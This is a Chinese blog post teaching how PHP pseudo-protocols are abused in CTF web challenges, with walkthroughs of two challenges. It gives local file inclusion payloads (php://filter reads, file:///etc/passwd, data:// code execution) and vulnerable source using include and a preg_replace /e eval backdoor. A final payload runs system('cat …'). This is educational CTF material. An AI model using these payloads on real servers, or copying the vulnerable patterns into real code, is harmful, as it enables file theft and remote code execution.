<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHP伪协议在ctf中的应用"><meta name="keywords" content=""><meta name="author" content="YTsang"><meta name="copyright" content="YTsang"><title>PHP伪协议在ctf中的应用 | Y. blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Y. blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#file-%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.</span> <span class="toc-text">file:&#x2F;&#x2F;协议</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#php-%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.</span> <span class="toc-text">php:&#x2F;&#x2F;协议</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#php-filter"><span class="toc-number">2.1.</span> <span class="toc-text">php:&#x2F;&#x2F;filter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php-input"><span class="toc-number">2.2.</span> <span class="toc-text">php:&#x2F;&#x2F;input</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#phar-%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.</span> <span class="toc-text">**phar:&#x2F;&#x2F;**协议</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#data-%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.</span> <span class="toc-text">data:&#x2F;&#x2F;协议</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#zlib-%E5%8D%8F%E8%AE%AE"><span class="toc-number">5.</span> <span class="toc-text">zlib:&#x2F;&#x2F;协议</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#zip-%EF%BC%9A"><span class="toc-number">5.1.</span> <span class="toc-text">**zip:&#x2F;&#x2F;**：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bzip2-%EF%BC%9A"><span class="toc-number">5.2.</span> <span class="toc-text">**bzip2:&#x2F;&#x2F;**：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#zlib-%EF%BC%9A"><span class="toc-number">5.3.</span> <span class="toc-text">**zlib:&#x2F;&#x2F;**：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA%E5%88%86%E6%9E%90"><span class="toc-number">6.</span> <span class="toc-text">靶机分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Include1"><span class="toc-number">6.1.</span> <span class="toc-text">[ACTF2020 新生赛]Include1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#preg-replace"><span class="toc-number">6.2.</span> <span class="toc-text">preg_replace</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://note.youdao.com/yws/api/personal/file/WEB4d4bfca5baf6c87d4aa15350aa33e8a7?method=download&amp;shareKey=fec53138a84367efadb03ddfa08bcb24"></div><div class="author-info__name text-center">YTsang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">20</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Y. blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"></span></div><div id="post-info"><div id="post-title">PHP伪协议在ctf中的应用</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-05-08</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>经常遇到php伪协议，总结一下。</p>
<p>php中支持的伪协议</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F; — 访问各个输入&#x2F;输出流（I&#x2F;O streams）</span><br><span class="line">file:&#x2F;&#x2F; — 访问本地文件系统</span><br><span class="line">phar:&#x2F;&#x2F; — PHP 归档</span><br><span class="line">zlib:&#x2F;&#x2F; — 压缩流</span><br><span class="line">data:&#x2F;&#x2F; — 数据（RFC 2397）</span><br><span class="line">http:&#x2F;&#x2F; — 访问 HTTP(s) 网址</span><br><span class="line">ftp:&#x2F;&#x2F; — 访问 FTP(s) URLs</span><br><span class="line">glob:&#x2F;&#x2F; — 查找匹配的文件路径模式</span><br><span class="line">ssh2:&#x2F;&#x2F; — Secure Shell 2</span><br><span class="line">rar:&#x2F;&#x2F; — RAR</span><br><span class="line">ogg:&#x2F;&#x2F; — 音频流</span><br><span class="line">expect:&#x2F;&#x2F; — 处理交互式的流</span><br></pre></td></tr></table></figure>

<h1 id="file-协议"><a href="#file-协议" class="headerlink" title="file://协议"></a>file://协议</h1><p>**file://**：用于访问本地文件。常与curl函数结合一起</p>
<p>allow_url_fopen:默认值是ON，允许url里的封装协议访问文件</p>
<p>allow_url_include:默认值是OFF,不允许包含url里的封装协议包含文件</p>
<p>file://协议不受影响，当这两个参数都是off时，file://协议也能使用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file:&#x2F;&#x2F; 协议必须是绝对路径和文件名</span><br><span class="line">file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br><span class="line">···</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEBd2b530f1426daa10b865c58b8b144e54?method=download&shareKey=e58da1bcfb5a8484e190044e48d506a9"></p>
<h1 id="php-协议"><a href="#php-协议" class="headerlink" title="php://协议"></a>php://协议</h1><p>**php://**：用于访问各个输入输出流。有<code>php://filter</code>、<code>php://input</code>。</p>
<h2 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h2><p>这是较为经常使用的伪协议，用于任意文件读取，通常用于读flag文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;[read&#x2F;write]&#x3D;string.[rot13&#x2F;strip_tags&#x2F;…..]&#x2F;resource&#x3D;xxx</span><br></pre></td></tr></table></figure>

<p>php://filter参数：</p>
<table>
<thead>
<tr>
<th align="center">名称</th>
<th align="center">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="center">resource=&lt;要过滤的数据流&gt;</td>
<td align="center">这个参数是必须的。它指定了你要筛选过滤的数据流。</td>
</tr>
<tr>
<td align="center">read=&lt;读链的筛选列表&gt;</td>
<td align="center">该参数可选。可以设定一个或多个过滤器名称，以管道符(|)分隔</td>
</tr>
<tr>
<td align="center">write=&lt;写链的筛选列表&gt;</td>
<td align="center">该参数可选。可以设定一个或多个过滤器名称，以管道符(|)分隔</td>
</tr>
<tr>
<td align="center">&lt;；两个链的筛选列表&gt;</td>
<td align="center">任何没有以 <em>read=</em> 或 <em>write=</em> 作前缀 的筛选器列表会视情况应用于读或写链。</td>
</tr>
</tbody></table>
<p>payload读取源代码并base64输出。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;xxx.php</span><br></pre></td></tr></table></figure>

<h2 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a><strong>php://input</strong></h2><p><code>php://input</code>可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。使用需要开启allow_url_include 。</p>
<p>当<code>enctype=&quot;multipart/form-data&quot;</code>时，<code>php://input</code>是无效的。 </p>
<h1 id="phar-协议"><a href="#phar-协议" class="headerlink" title="**phar://**协议"></a>**phar://**协议</h1><p> **phar://**：PHP 归档，在ctf常常跟文件包含，文件上传结合着考察。 通俗点说就是php解压缩包的一个函数，解压的压缩包与后缀无关。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">phar:&#x2F;&#x2F;test.[zip&#x2F;jpg&#x2F;png…]&#x2F;file.txt</span><br></pre></td></tr></table></figure>

<h1 id="data-协议"><a href="#data-协议" class="headerlink" title="data://协议"></a>data://协议</h1><p>**data://**：需满足<code>allow_url_fopen</code>，<code>allow_url_include</code>同时开启才能使用。 通常可以用来执行PHP代码。 </p>
<p>很常用的数据流构造器，将读取后面base64编码字符串后解码的数据作为数据流的输入 。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">data:&#x2F;&#x2F;text&#x2F;plain;base64,base编码字符串</span><br><span class="line">data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php phpinfo()?&gt;</span><br><span class="line">data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpPz4&#x3D;</span><br></pre></td></tr></table></figure>

<h1 id="zlib-协议"><a href="#zlib-协议" class="headerlink" title="zlib://协议"></a>zlib://协议</h1><p>以下三种在<code>allow_url_fopen</code>，<code>allow_url_include</code>都关闭的情况下可以正常使用 </p>
<h2 id="zip-："><a href="#zip-：" class="headerlink" title="**zip://**："></a>**zip://**：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file.php?file&#x3D;zip:&#x2F;&#x2F;[压缩文件绝对路径]#[压缩文件内的子文件名]</span><br></pre></td></tr></table></figure>

<h2 id="bzip2-："><a href="#bzip2-：" class="headerlink" title="**bzip2://**："></a>**bzip2://**：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file.php?file&#x3D;compress.bzip2:&#x2F;&#x2F;nac.bz2</span><br></pre></td></tr></table></figure>

<h2 id="zlib-："><a href="#zlib-：" class="headerlink" title="**zlib://**："></a>**zlib://**：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file.php?file&#x3D;compress.zlib:&#x2F;&#x2F;file.gz</span><br></pre></td></tr></table></figure>

<h1 id="靶机分析"><a href="#靶机分析" class="headerlink" title="靶机分析"></a>靶机分析</h1><h2 id="ACTF2020-新生赛-Include1"><a href="#ACTF2020-新生赛-Include1" class="headerlink" title="[ACTF2020 新生赛]Include1"></a>[ACTF2020 新生赛]Include1</h2><ul>
<li><p>题目提示文件包含，猜测用伪协议读取，用php://filter读</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB9b0be7cafb070178f7ea83afd368dbf8?method=download&shareKey=51123d2718705c4cd8437f7bc22fa07d"></p>
</li>
<li><p>读取出一串base64编码，解码后就有flag。</p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBd80b2d3e521ccd9377ed9f4310fc6003?method=download&shareKey=1cd6ac9769f6271bccf4e37f590ebe98"></p>
</li>
</ul>
<h2 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace"></a>preg_replace</h2><ul>
<li><p>直接给出源码,<code>file_get_contents</code>需全等于<code>ohhhhhhhhhhhhh</code>同时读ohhh.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">$text &#x3D; $_GET[&quot;contents&quot;];</span><br><span class="line">$file &#x3D; $_GET[&quot;file&quot;];</span><br><span class="line">if(isset($text)&amp;&amp;(file_get_contents($text,&#39;r&#39;)&#x3D;&#x3D;&#x3D;&quot;ohhhhhhhhhhhhh&quot;))&#123;</span><br><span class="line">    echo &quot;&lt;br&gt;&lt;h4&gt;&quot;.file_get_contents($text,&#39;r&#39;).&quot;&lt;&#x2F;h4&gt;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    if(preg_match(&quot;&#x2F;flag&#x2F;&quot;,$file))&#123;</span><br><span class="line">        die(&quot;NONONONO&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    include($file);  &#x2F;&#x2F;ohhh.php</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>用data://和php://伪协议读ohhh.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">contents&#x3D;data:text&#x2F;plain;base64,b2hoaGhoaGhoaGhoaGg&#x3D;&amp;file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;ohhh.php</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEBf6c0a88ee51e9180956d2f651e391f71?method=download&shareKey=3276110a6f0fa571cc0a69c449bc42f4"></p>
</li>
<li><p>base64解码后即为ohhh.php源码，利用preg_replace /e漏洞进行代码执行，读flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id &#x3D; $_GET[&#39;id&#39;];</span><br><span class="line">$_SESSION[&#39;id&#39;] &#x3D; $id;</span><br><span class="line"></span><br><span class="line">function complex($re, $str) &#123;</span><br><span class="line">    return preg_replace(</span><br><span class="line">        &#39;&#x2F;(&#39; . $re . &#39;)&#x2F;ei&#39;,</span><br><span class="line">        &#39;strtolower(&quot;\\1&quot;)&#39;,</span><br><span class="line">        $str</span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">foreach($_GET as $re &#x3D;&gt; $str) &#123;</span><br><span class="line">    echo complex($re, $str). &quot;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getFlag()&#123;</span><br><span class="line">	@eval($_GET[&#39;cmd&#39;]);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\S*&#x3D;$&#123;getFlag()&#125;&amp;cmd&#x3D;system(%27cat%20&#x2F;var&#x2F;tmp&#x2F;flag%27);</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB46823b2daf9f0cb7287796f11226cc44?method=download&shareKey=dbd804e7c99bed316d1b6ff192211a39"></p>
</li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">YTsang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2021/05/08/PHP伪协议在ctf中的应用/">http://example.com/2021/05/08/PHP伪协议在ctf中的应用/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com">Y. blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/05/17/%E5%9B%BD%E8%B5%9Bwriteup/"><i class="fa fa-chevron-left">  </i><span>国赛线上初赛writeup</span></a></div><div class="next-post pull-right"><a href="/2021/04/08/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E6%B5%B7%E5%95%B8%E6%9D%AFwriteup/"><span>第四届海啸杯writeup</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By YTsang</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>